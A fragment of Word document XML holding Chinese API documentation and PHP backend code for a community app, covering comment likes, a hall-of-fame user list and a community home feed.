        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6247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点赞｜取消点赞成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144BE6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zan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点赞；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6D2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点赞失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525971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4C5C62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3306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_ping_xia_zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33867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B928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254CE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ember_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AA71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2D96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A7493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点赞动态追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65471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29BF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3C6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27D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_id = input('param.ping_xia_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D265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_xia_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42650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90A1C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动态追评</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53E5E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57E9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D75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7682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xia = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1B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02B0E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7F394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ping_xia)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B5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ing_xia_id'] = $ping_xia_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A37E5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xia_zan = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7469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25F8CE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51C6C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empty($circle_article_ping_xia_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85E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xia_zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274C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xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462414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7137C9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4433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21B1E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406257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C2C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xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26554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31BB1C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Dec('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724EAF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点赞您所发布的动态追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB99A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member_id'], $content, '', '', '', $ping_xia['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5B29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A6245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点赞成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17059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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD855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46B6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4E24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xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F230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4423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7B416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1854A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reate_time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0326B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464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xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A49E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7D67B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_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE042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追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BD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member_id'], $content, '', '', '', $ping_xia['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1271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0A72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1692B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16C1A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99C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BDE8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3872C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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D40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47971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article_ping_xia_zan_id = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE6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5FFA78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ircle_article_ping_xia_zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E01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_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BE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ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A86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Inc('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22993B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点赞您所发布的动态追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7C3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ping_xia['member_id'], $content, '', '', '', $ping_xia['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17044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1A19C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点赞成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A971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gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C3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5BA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5EF2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8C1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3FF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06DF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动态追评不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E70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4B7C7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6B5A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70F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A10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1E5F7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点赞失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E55F0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20719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5D4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58DC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098A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elites </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取名人堂列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690AF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名人堂列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DDC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F402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C250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63917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5FBE1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1B40C7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名人堂用户列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F364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total       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014C64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per_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC18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urrent_page </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D237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           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BB75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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A497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nickname     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034CD8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         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D74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mobile       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手机号码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D37B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g          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECCD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rticle_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335C2F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_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728EC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登录用户已关注该用户（</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6AEF0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6EA762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2670FA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3F6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lites()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35557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81A7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4B047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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F069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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310E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id, nickname, user, mobile, img')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7FA0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s_elite', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43C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343042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3A66E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toArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D79E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elites['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F05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elites['data'] as $key =&gt; $elite) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309047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article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1002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elite['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434DF7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11DA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article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DAD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elite['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB910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FB4C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follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B3F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elite['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5D2B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05DD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img'] = $elite['img'] ? _imgUrl() . $elite['img'] : '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFFE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follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650E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A007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member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E94DA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0F9FF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elite['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E8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36A2F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 &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3E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data'][$key]['follow'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98D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D4F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2E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ED0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7DBE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ites = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6524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3780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lites);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56DF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DA1B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6F6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home </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区首页（我的社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区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36AB4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用户社区首页（我的社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区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64059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603BB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83DB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121E51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302608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3E220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数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F8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circles           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我的社区列表（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条记录）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33035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articles          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区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228E6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4B951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32E19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码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14822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data              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDB1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circles      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D08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s.img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>logo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F877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s.title         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4637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s.content       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C27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circles.article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A7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Integer} data.circles.follower_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D88F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articles     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C11D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data.articles.image_urls  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741AE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zan_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点赞次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB8D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cai_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点踩次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011F4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ping_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931B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share_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73623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is_top    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否置顶：</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1B252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is_selected </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否加精：</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7BD9D8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author_username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54F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author_img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29577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author_follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B90C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author_article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C934A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zan       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该动态：</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599EE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rticles.follow    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否关注该动态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F80EF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articles.circle       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076DE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circle.title </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B548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circle.img   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区头像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75146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circle.article_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C80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circle.follower_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态所属社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920FB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circle.follow   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否该动态所属社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01687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articles.pings                      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态的两条评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206443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pings.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4182F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rticles.pings.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D921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EEA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ome()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B5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F06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3083D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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D154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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B725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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641AC7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_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D1F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F541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s = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D9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circle_id')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69038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46A85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42E5B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19F7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circles)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA9C3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ollowed_circles as $followed_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD7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_ids[] = $followed_circle['circle_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9AD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6809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3A32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circle_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAB9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1DEB1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n', $followed_circle_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF4FB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77683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751676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9C14E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FBE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79E4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count($circles) == 0) {</w:t>
      </w:r>
    </w:p>
